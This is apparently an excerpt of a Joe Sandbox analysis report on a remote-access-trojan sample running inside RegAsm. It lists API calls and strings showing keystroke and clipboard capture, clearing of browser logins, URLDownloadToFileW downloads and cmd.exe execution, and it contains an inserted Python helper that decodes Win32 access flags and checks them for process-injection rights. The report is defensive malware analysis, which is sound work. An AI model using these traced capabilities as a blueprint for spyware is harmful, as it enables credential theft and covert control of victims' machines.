                                                        • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                                                        • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                                          • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                        • String ID: bad locale name
                                                        • API String ID: 3628047217-1405518554
                                                        • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                        • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                                        • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                                                        • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                                        • ShowWindow.USER32(00000009), ref: 00416C61
                                                        • SetForegroundWindow.USER32 ref: 00416C6D
                                                          • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                                                          • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                          • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                                        • String ID: !D@
                                                        • API String ID: 3446828153-604454484
                                                        • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                                        • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: ExecuteShell
                                                        • String ID: /C $cmd.exe$open
                                                        • API String ID: 587946157-3896048727
                                                        • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                                        • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                        • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                                                        • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: TerminateThread$HookUnhookWindows
                                                        • String ID: pth_unenc
                                                        • API String ID: 3123878439-4028850238
                                                        • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                        • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                                        • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                                        • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
• GetProcAddress.KERNEL32(00000000), ref: 0040141B
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetCursorInfo$User32.dll
• API String ID: 1646373207-2714051624
• Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
• Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
• Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
• Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
• GetProcAddress.KERNEL32(00000000), ref: 004014C0
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetLastInputInfo$User32.dll
• API String ID: 2574300362-1519888992
• Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
• Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
• Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
• Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: __alldvrm$_strrchr
• API String ID: 1036877536-0
• Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
• Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
• Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
• Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
• Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
• Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
• Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
Uniqueness Score: -1.00%

Strings
• [Cleared browsers logins and cookies.], xrefs: 0040C0E4
• Cleared browsers logins and cookies., xrefs: 0040C0F5
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
• Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
• Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
• Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
• Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
  • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
  • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
• Sleep.KERNEL32(000001F4), ref: 0040A573
• Sleep.KERNEL32(00000064), ref: 0040A5FD
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
• Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
• Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
• Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
• Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
• Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
• Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
• Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
• Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
• Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
• Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
• CloseHandle.KERNEL32(00000000), ref: 0041C4E5
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• API String ID: 3919263394-0
• Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
• Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
• Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
• Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
Uniqueness Score: -1.00%

APIs
• OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
• OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
• CloseHandle.KERNEL32(00000000), ref: 0041C233
• CloseHandle.KERNEL32(00000000), ref: 0041C23B
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: CloseHandleOpenProcess
• API String ID: 39102293-0
• Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
• Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
• Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
• Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
Uniqueness Score: -1.00%

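The two records above print the call arguments as raw hex: CreateFileW with 80000000 / 00000003 / 00000003 / 00000080, and OpenProcess with 00001000 and 00000400. Decoding those values against the documented Win32 constants is what turns the lines into a statement about capability: the file is opened GENERIC_READ with read and write sharing and OPEN_EXISTING, then sized and read in one go; the processes are opened with query-only rights, enough to enumerate or inspect them but not to write their memory or start a thread in them. The Python below is an added example, not Joe Sandbox output and not code from the sample. CALL_LINES are copied from the records on this page (Sleep(000001F4) from an earlier record is included to show the same decoder gives 500 ms); the flag tables are the documented single-bit constants, and INJECTION_RIGHTS is the example's own definition of what a classic CreateRemoteThread-style injection needs on the target.

```python
import re
from typing import Dict, List, Union

Arg = Union[int, str]

# Call lines exactly as this report prints them (constructed input copied from
# the listing). "?" is an argument the sandbox could not recover; symbolic
# arguments such as pth_unenc stay as names.
CALL_LINES = [
    "CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E",
    "OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5",
    "OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208",
    "Sleep.KERNEL32(000001F4), ref: 0040A573",
]

# Name.MODULE(args), ref: ADDR  -- the parentheses are absent when no argument
# was recovered, and subcall lines carry a "Part of subcall function X:" prefix.
CALL_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Documented Win32 constants (winnt.h, fileapi.h, processthreadsapi.h).
# Every entry is a single bit, so a mask can be split bit by bit.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
CREATION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
            4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE", 0x40000000: "FILE_FLAG_OVERLAPPED"}
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
                  0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
                  0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
                  0x0080: "PROCESS_CREATE_PROCESS", 0x0200: "PROCESS_SET_INFORMATION",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
                  0x1000: "PROCESS_QUERY_LIMITED_INFORMATION", 0x100000: "SYNCHRONIZE"}
# Example's own threshold: rights a CreateRemoteThread-style injection needs.
INJECTION_RIGHTS = {"PROCESS_VM_OPERATION", "PROCESS_VM_WRITE", "PROCESS_CREATE_THREAD"}


def parse_call(line: str) -> dict:
    """Split 'Name.MODULE(args), ref: ADDR' into api, module, args and ref."""
    m = CALL_RE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError(f"not a call line: {line!r}")
    args: List[Arg] = []
    for tok in (m["args"] or "").split(","):
        tok = tok.strip()
        if tok:  # 8 hex digits become an int; "?" and symbolic names stay strings
            args.append(int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok)
    return {"api": m["api"], "module": m["mod"], "args": args, "ref": m["ref"]}


def decode_mask(value: Arg, table: Dict[int, str]) -> List[str]:
    """Name every known bit of a mask; leftover bits are reported as hex."""
    if not isinstance(value, int):
        return [str(value)]  # unrecovered argument, nothing to decode
    names, rest = [], value
    for bit, name in sorted(table.items()):
        if value & bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return names or ["0"]


def decode_call(line: str) -> dict:
    """Parse one call line and annotate the arguments whose meaning the API fixes."""
    call = parse_call(line)
    a = call["args"]
    if call["api"] in ("CreateFileW", "CreateFileA") and len(a) >= 6:
        call["desired_access"] = decode_mask(a[1], GENERIC_ACCESS)
        call["share_mode"] = decode_mask(a[2], SHARE_MODE)
        call["creation"] = CREATION.get(a[4], f"0x{a[4]:X}") if isinstance(a[4], int) else str(a[4])
        call["flags"] = decode_mask(a[5], FILE_FLAGS)
    elif call["api"] == "OpenProcess" and a:
        call["desired_access"] = decode_mask(a[0], PROCESS_ACCESS)
        call["allows_injection"] = INJECTION_RIGHTS <= set(call["desired_access"])
    elif call["api"] == "Sleep" and a and isinstance(a[0], int):
        call["milliseconds"] = a[0]
    return call


if __name__ == "__main__":
    for line in CALL_LINES:
        d = decode_call(line)
        extra = {k: v for k, v in d.items() if k not in ("api", "module", "args", "ref")}
        print(f"{d['api']} @ {d['ref']}: {extra}")
```

On a saved copy of the report, feed every line that matches the Name.MODULE(...) , ref: pattern through decode_call and look at allows_injection: an OpenProcess mask carrying PROCESS_VM_WRITE and PROCESS_CREATE_THREAD would mark a function that can inject, whereas the two calls in this record ask for PROCESS_QUERY_LIMITED_INFORMATION and PROCESS_QUERY_INFORMATION only.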
APIs
• ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
  • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
• _UnwindNestedFrames.LIBCMT ref: 00439891
• ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
• CallCatchBlock.LIBVCRUNTIME ref: 004398C7
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
• API String ID: 2633735394-0
• Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
• Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
• Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
• Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: MetricsSystem
• API String ID: 4116985748-0
• Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
• Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
• Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
• Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
Uniqueness Score: -1.00%

APIs
• ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
• ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
• ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
  • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
• ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
• API String ID: 1761009282-0
• Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
• Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
• Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
• Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
Uniqueness Score: -1.00%

APIs
• __startOneArgErrorHandling.LIBCMT ref: 00442CED
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
• Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
• Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
• Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
• __Init_thread_footer.LIBCMT ref: 0040B797
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: Init_thread_footer__onexit
• String ID: [End of clipboard]$[Text copied to clipboard]
• API String ID: 1881088180-3686566968
• Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
• Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
• Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
• Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
Uniqueness Score: -1.00%

APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
• Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
• Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
• Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
• GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 0040501F
Memory Dump Source
• Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
Similarity
• API ID: LocalTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 481472006-1507639952
• Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
• Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
• Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
• Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
Uniqueness Score: -1.00%

                                                        APIs
                                                        • Sleep.KERNEL32 ref: 00416640
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DownloadFileSleep
                                                        • String ID: !D@
                                                        • API String ID: 1931167962-604454484
                                                        • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                                        • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LocalTime
                                                        • String ID: | $%02i:%02i:%02i:%03i
                                                        • API String ID: 481472006-2430845779
                                                        • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                                        • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                                        Strings
                                                        Memory Dump Source
